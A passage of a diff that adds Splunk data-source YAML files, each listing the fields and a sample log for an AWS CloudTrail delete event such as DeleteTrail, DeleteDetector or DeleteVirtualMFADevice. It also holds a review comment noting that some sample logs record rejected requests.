+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "Root", "principalId":
+ "111111111111", "arn": "arn:aws:iam::111111111111:root", "accountId": "111111111111",
+ "accessKeyId": "ASIASBMSCQHHWMDJXSE6", "sessionContext": {"sessionIssuer": {}, "webIdFederationData":
+ {}, "attributes": {"creationDate": "2023-01-26T18:44:21Z", "mfaAuthenticated": "false"}}},
+ "eventTime": "2023-01-26T21:23:22Z", "eventSource": "iam.amazonaws.com", "eventName":
+ "DeleteAccountPasswordPolicy", "awsRegion": "us-east-1", "sourceIPAddress": "23.93.193.7",
+ "userAgent": "AWS Internal", "requestParameters": null, "responseElements": null,
+ "requestID": "e3616938-1aac-4abd-9ea3-3b0367b85082", "eventID": "bbd8cb02-22ba-4d1b-b23d-b82975463376",
+ "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId":
+ "111111111111", "eventCategory": "Management", "sessionCredentialFromConsole": "true"}'
diff --git a/data_sources/aws_cloudtrail_deletedetector.yml b/data_sources/aws_cloudtrail_deletedetector.yml
new file mode 100644
index 0000000000..3c62564018
--- /dev/null
+++ b/data_sources/aws_cloudtrail_deletedetector.yml
@@ -0,0 +1,98 @@
+name: AWS CloudTrail DeleteDetector
+id: 5d8bd475-c8bc-4447-b27f-efa508728b90
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail DeleteDetector
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.detectorId
+- responseElements.__type
+- responseElements.message
+- result_id
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+ "AIDAYTOGP2RLI4PXTGCEU", "arn": "arn:aws:iam::111111111111:user/gowthamaraj_cli",
+ "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLFLKADUVG", "userName":
+ "gowthamaraj_cli"}, "eventTime": "2022-07-21T20:27:54Z", "eventSource": "guardduty.amazonaws.com",
+ "eventName": "DeleteDetector", "awsRegion": "us-west-2", "sourceIPAddress": "67.171.71.185",
+ "userAgent": "aws-cli/2.7.3 Python/3.9.13 Darwin/21.5.0 source/x86_64 prompt/off
+ command/guardduty.delete-detector", "errorCode": "BadRequestException", "requestParameters":
+ {"detectorId": "123"}, "responseElements": {"message": "The request is rejected
+ because the parameter detectorId has an invalid value.", "__type": "InvalidInputException"},
+ "requestID": "1e832076-d7a8-432b-b0df-54ba62f6b62c", "eventID": "c1367a2f-8910-4e64-9256-a854d2e9f37d",
+ "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId":
+ "111111111111", "eventCategory": "Management"}'
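Review bot: The `example_log` records a rejected call (`"errorCode": "BadRequestException"`, with `responseElements.message` and `responseElements.__type` carrying the InvalidInputException text), so the `fields` list is derived from the error path of DeleteDetector rather than from a successful deletion; a successful call presumably returns different responseElements, and any field present only on success is missing here. The DeleteIPSet sample below has the same shape, and the DeleteGroup sample is a NoSuchEntityException failure. If a successful sample is not available, a note such as `description: Data source object for AWS CloudTrail DeleteDetector (example_log captures a rejected request)` would stop a reader from treating these fields as the success-path schema.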
diff --git a/data_sources/aws_cloudtrail_deletegroup.yml b/data_sources/aws_cloudtrail_deletegroup.yml
new file mode 100644
index 0000000000..f9e225a9b4
--- /dev/null
+++ b/data_sources/aws_cloudtrail_deletegroup.yml
@@ -0,0 +1,102 @@
+name: AWS CloudTrail DeleteGroup
+id: c95308a4-a943-42ca-b112-f90a05c21bd3
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail DeleteGroup
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- action
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- errorMessage
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- reason
+- recipientAccountId
+- region
+- requestID
+- requestParameters.groupName
+- responseElements
+- result
+- result_id
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+ "AIDAYTOGP2RLEHRX5YWNV", "arn": "arn:aws:iam::121522247101:user/bhavin_cli", "accountId":
+ "121522247101", "accessKeyId": "AKIAYTOGP2RLLAA6NJUM", "userName": "bhavin_cli"},
+ "eventTime": "2021-04-07T00:17:50Z", "eventSource": "iam.amazonaws.com", "eventName":
+ "DeleteGroup", "awsRegion": "us-east-1", "sourceIPAddress": "12.12.12.20", "userAgent":
+ "aws-cli/2.0.62 Python/3.9.2 Darwin/19.6.0 source/x86_64 command/iam.delete-group",
+ "errorCode": "NoSuchEntityException", "errorMessage": "The group with name AtomicRedTeam_Victim
+ cannot be found.", "requestParameters": {"groupName": "AtomicRedTeam_Victim"}, "responseElements":
+ null, "requestID": "15684d3b-a8c5-4334-a996-16619e901c17", "eventID": "ab65dca3-3d28-41f4-9f99-443606cc49fe",
+ "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "eventCategory":
+ "Management", "recipientAccountId": "121522247101"}'
diff --git a/data_sources/aws_cloudtrail_deleteipset.yml b/data_sources/aws_cloudtrail_deleteipset.yml
new file mode 100644
index 0000000000..78c912c368
--- /dev/null
+++ b/data_sources/aws_cloudtrail_deleteipset.yml
@@ -0,0 +1,99 @@
+name: AWS CloudTrail DeleteIPSet
+id: ebdeeb63-77a0-4808-a6fe-549956731377
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail DeleteIPSet
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.detectorId
+- requestParameters.ipSetId
+- responseElements.__type
+- responseElements.message
+- result_id
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+ "AIDAYTOGP2RLEHRX5YWNV", "arn": "arn:aws:iam::111111111111:user/bhavin_cli", "accountId":
+ "111111111111", "accessKeyId": "AKIAYTOGP2RLKQ3U2PDY", "userName": "bhavin_cli"},
+ "eventTime": "2022-07-26T23:14:57Z", "eventSource": "guardduty.amazonaws.com", "eventName":
+ "DeleteIPSet", "awsRegion": "us-west-2", "sourceIPAddress": "142.254.89.27", "userAgent":
+ "aws-cli/2.0.62 Python/3.9.2 Darwin/21.5.0 source/x86_64 command/guardduty.delete-ip-set",
+ "errorCode": "BadRequestException", "requestParameters": {"detectorId": "11111",
+ "ipSetId": "1111"}, "responseElements": {"message": "The request is rejected because
+ the parameter detectorId has an invalid value.", "__type": "InvalidInputException"},
+ "requestID": "70d36916-4ce7-4b6e-9226-9da47d58d554", "eventID": "884dc529-d98f-4529-bfa1-8cdd6c06d02f",
+ "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId":
+ "111111111111", "eventCategory": "Management"}'
diff --git a/data_sources/aws_cloudtrail_deleteloggroup.yml b/data_sources/aws_cloudtrail_deleteloggroup.yml
new file mode 100644
index 0000000000..f8325f0e05
--- /dev/null
+++ b/data_sources/aws_cloudtrail_deleteloggroup.yml
@@ -0,0 +1,100 @@
+name: AWS CloudTrail DeleteLogGroup
+id: 60cf6a69-fa43-4a6c-8808-e9fb46bf387f
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail DeleteLogGroup
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- apiVersion
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.logGroupName
+- responseElements
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- tlsDetails.cipherSuite
+- tlsDetails.clientProvidedHostHeader
+- tlsDetails.tlsVersion
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+ "AIDAYTOGP2RLI4PXTGCEU", "arn": "arn:aws:iam::111111111111:user/gowthamaraj_cli",
+ "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLFLKADUVG", "userName":
+ "gowthamaraj_cli"}, "eventTime": "2022-07-19T08:58:48Z", "eventSource": "logs.amazonaws.com",
+ "eventName": "DeleteLogGroup", "awsRegion": "us-west-2", "sourceIPAddress": "67.171.71.185",
+ "userAgent": "aws-cli/2.7.3 Python/3.9.13 Darwin/21.5.0 source/x86_64 prompt/off
+ command/logs.delete-log-group", "requestParameters": {"logGroupName": "test-logs"},
+ "responseElements": null, "requestID": "76089b03-d749-4f83-bc0e-b857c83bba5f", "eventID":
+ "5aba96c4-e7f9-4e4f-b5e6-49694162195d", "readOnly": false, "eventType": "AwsApiCall",
+ "apiVersion": "20140328", "managementEvent": true, "recipientAccountId": "111111111111",
+ "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite":
+ "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "logs.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/aws_cloudtrail_deletelogstream.yml b/data_sources/aws_cloudtrail_deletelogstream.yml
new file mode 100644
index 0000000000..693f606fd2
--- /dev/null
+++ b/data_sources/aws_cloudtrail_deletelogstream.yml
@@ -0,0 +1,101 @@
+name: AWS CloudTrail DeleteLogStream
+id: 6f8bb808-89f8-465e-a34d-229df2f46402
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail DeleteLogStream
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- apiVersion
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.logGroupName
+- requestParameters.logStreamName
+- responseElements
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- tlsDetails.cipherSuite
+- tlsDetails.clientProvidedHostHeader
+- tlsDetails.tlsVersion
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+ "AIDAYTOGP2RLI4PXTGCEU", "arn": "arn:aws:iam::111111111111:user/gowthamaraj_cli",
+ "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLFLKADUVG", "userName":
+ "gowthamaraj_cli"}, "eventTime": "2022-07-20T21:09:51Z", "eventSource": "logs.amazonaws.com",
+ "eventName": "DeleteLogStream", "awsRegion": "us-west-2", "sourceIPAddress": "67.171.71.185",
+ "userAgent": "aws-cli/2.7.3 Python/3.9.13 Darwin/21.5.0 source/x86_64 prompt/off
+ command/logs.delete-log-stream", "requestParameters": {"logGroupName": "test-logs",
+ "logStreamName": "20150601"}, "responseElements": null, "requestID": "2d7e859e-d697-426f-8b56-c4c11c4055f3",
+ "eventID": "561c3f4e-17ca-4438-b15d-29903baf7b13", "readOnly": false, "eventType":
+ "AwsApiCall", "apiVersion": "20140328", "managementEvent": true, "recipientAccountId":
+ "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2",
+ "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "logs.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/aws_cloudtrail_deletenetworkaclentry.yml b/data_sources/aws_cloudtrail_deletenetworkaclentry.yml
new file mode 100644
index 0000000000..87aa8f17ff
--- /dev/null
+++ b/data_sources/aws_cloudtrail_deletenetworkaclentry.yml
@@ -0,0 +1,110 @@
+name: AWS CloudTrail DeleteNetworkAclEntry
+id: a0dd0f10-cc03-425d-bd5a-e1e0d954b856
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail DeleteNetworkAclEntry
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- action
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- direction
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.egress
+- requestParameters.networkAclId
+- requestParameters.ruleNumber
+- responseElements._return
+- responseElements.requestId
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.sessionContext.attributes.creationDate
+- userIdentity.sessionContext.attributes.mfaAuthenticated
+- userIdentity.sessionContext.sessionIssuer.accountId
+- userIdentity.sessionContext.sessionIssuer.arn
+- userIdentity.sessionContext.sessionIssuer.principalId
+- userIdentity.sessionContext.sessionIssuer.type
+- userIdentity.sessionContext.sessionIssuer.userName
+- userIdentity.type
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId":
+ "AROAIJIESMXKGCJRCTPR6:pbareiss@splunk.local", "arn": "arn:aws:sts::111111111111:assumed-role/okta_adm_role/pbareiss@splunk.local",
+ "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLF3F7BXZK", "sessionContext":
+ {"sessionIssuer": {"type": "Role", "principalId": "AROAIJIESMXKGCJRCTPR6", "arn":
+ "arn:aws:iam::111111111111:role/okta_adm_role", "accountId": "111111111111", "userName":
+ "okta_adm_role"}, "webIdFederationData": {}, "attributes": {"mfaAuthenticated":
+ "false", "creationDate": "2021-01-12T08:36:15Z"}}}, "eventTime": "2021-01-12T09:26:26Z",
+ "eventSource": "ec2.amazonaws.com", "eventName": "DeleteNetworkAclEntry", "awsRegion":
+ "eu-central-1", "sourceIPAddress": "95.90.199.65", "userAgent": "console.ec2.amazonaws.com",
+ "requestParameters": {"networkAclId": "acl-078ccebebcbabe175", "ruleNumber": 40,
+ "egress": false}, "responseElements": {"requestId": "607474bb-836b-46be-be4a-351ebbef67d6",
+ "_return": true}, "requestID": "607474bb-836b-46be-be4a-351ebbef67d6", "eventID":
+ "b9e05770-e9b0-4ba1-91e8-6537097e06e7", "readOnly": false, "eventType": "AwsApiCall",
+ "managementEvent": true, "eventCategory": "Management", "recipientAccountId": "111111111111"}'
diff --git a/data_sources/aws_cloudtrail_deletepolicy.yml b/data_sources/aws_cloudtrail_deletepolicy.yml
new file mode 100644
index 0000000000..0c47f50789
--- /dev/null
+++ b/data_sources/aws_cloudtrail_deletepolicy.yml
@@ -0,0 +1,102 @@
+name: AWS CloudTrail DeletePolicy
+id: d190d23a-2c59-4a0e-9c55-a53ebef28ee5
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail DeletePolicy
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- action
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- errorMessage
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- reason
+- recipientAccountId
+- region
+- requestID
+- requestParameters.policyArn
+- responseElements
+- result
+- result_id
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+ "AIDAYTOGP2RLEHRX5YWNV", "arn": "arn:aws:iam::151521547504:user/bhavin_cli", "accountId":
+ "151521547504", "accessKeyId": "AKIAYTOGP2RLLAA6NJUM", "userName": "bhavin_cli"},
+ "eventTime": "2021-04-02T18:01:00Z", "eventSource": "iam.amazonaws.com", "eventName":
+ "DeletePolicy", "awsRegion": "us-east-1", "sourceIPAddress": "61.25.42.212", "userAgent":
+ "aws-cli/2.0.62 Python/3.9.2 Darwin/19.6.0 source/x86_64 command/iam.delete-policy",
+ "errorCode": "NoSuchEntityException", "errorMessage": "Policy arn:aws:iam::151521547504:policy/AtomicRedTeam
+ was not found.", "requestParameters": {"policyArn": "arn:aws:iam::151521547504:policy/AtomicRedTeam"},
+ "responseElements": null, "requestID": "90cbe52f-e744-4bba-9f5c-1843c9ca1855", "eventID":
+ "abd071bf-0a38-4fab-af4a-5eee55f0935e", "readOnly": false, "eventType": "AwsApiCall",
+ "managementEvent": true, "eventCategory": "Management", "recipientAccountId": "151521547504"}'
diff --git a/data_sources/aws_cloudtrail_deleterule.yml b/data_sources/aws_cloudtrail_deleterule.yml
new file mode 100644
index 0000000000..e7bae91f05
--- /dev/null
+++ b/data_sources/aws_cloudtrail_deleterule.yml
@@ -0,0 +1,102 @@
+name: AWS CloudTrail DeleteRule
+id: b5760623-f3ca-492d-a372-d5c2b3567dfc
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail DeleteRule
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- apiVersion
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.changeToken
+- requestParameters.ruleId
+- responseElements.changeToken
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- tlsDetails.cipherSuite
+- tlsDetails.clientProvidedHostHeader
+- tlsDetails.tlsVersion
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+ "AIDAYTOGP2RLI4PXTGCEU", "arn": "arn:aws:iam::111111111111:user/gowthamaraj_cli",
+ "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLFLKADUVG", "userName":
+ "gowthamaraj_cli"}, "eventTime": "2022-07-20T21:40:42Z", "eventSource": "waf.amazonaws.com",
+ "eventName": "DeleteRule", "awsRegion": "us-east-1", "sourceIPAddress": "67.171.71.185",
+ "userAgent": "aws-cli/2.7.3 Python/3.9.13 Darwin/21.5.0 source/x86_64 prompt/off
+ command/waf.delete-rule", "requestParameters": {"changeToken": "c5daf4cb-68e1-425f-b52d-49a32a7f187f",
+ "ruleId": "5a9b1c4a-a999-4bb2-9f51-555f086ff34f"}, "responseElements": {"changeToken":
+ "c5daf4cb-68e1-425f-b52d-49a32a7f187f"}, "requestID": "2089be3e-28ea-4349-b505-db72c81c272a",
+ "eventID": "0f815483-f6bb-42d9-b870-0dcc64ddc9a4", "readOnly": false, "eventType":
+ "AwsApiCall", "apiVersion": "2015-08-24", "managementEvent": true, "recipientAccountId":
+ "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2",
+ "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "waf.amazonaws.com"}}'
diff --git a/data_sources/aws_cloudtrail_deletetrail.yml b/data_sources/aws_cloudtrail_deletetrail.yml
new file mode 100644
index 0000000000..5c3bcc1690
--- /dev/null
+++ b/data_sources/aws_cloudtrail_deletetrail.yml
@@ -0,0 +1,98 @@
+name: AWS CloudTrail DeleteTrail
+id: a5af09ff-07b6-4df6-92a0-2146bfe402c8
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail DeleteTrail
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.name
+- responseElements
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- tlsDetails.cipherSuite
+- tlsDetails.clientProvidedHostHeader
+- tlsDetails.tlsVersion
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+ "AIDAYTOGP2RLEHRX5YWNV", "arn": "arn:aws:iam::111111111111:user/bhavin_cli", "accountId":
+ "111111111111", "accessKeyId": "AKIAYTOGP2RLKQ3U2PDY", "userName": "bhavin_cli"},
+ "eventTime": "2022-07-13T19:03:51Z", "eventSource": "cloudtrail.amazonaws.com",
+ "eventName": "DeleteTrail", "awsRegion": "us-west-2", "sourceIPAddress": "192.184.242.57",
+ "userAgent": "aws-cli/2.0.62 Python/3.9.2 Darwin/21.5.0 source/x86_64 command/cloudtrail.delete-trail",
+ "requestParameters": {"name": "redatomictesttrail"}, "responseElements": null, "requestID":
+ "2ba0af54-1451-4a2c-846e-18436bcee01e", "eventID": "1c53bcce-650d-486a-b3f6-f64fd853e509",
+ "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId":
+ "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2",
+ "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "cloudtrail.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/aws_cloudtrail_deletevirtualmfadevice.yml b/data_sources/aws_cloudtrail_deletevirtualmfadevice.yml
new file mode 100644
index 0000000000..87d90da25f
--- /dev/null
+++ b/data_sources/aws_cloudtrail_deletevirtualmfadevice.yml
@@ -0,0 +1,100 @@
+name: AWS CloudTrail DeleteVirtualMFADevice
+id: 84a08d6b-3d59-4260-8cab-84278ada262f
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail DeleteVirtualMFADevice
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- action
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
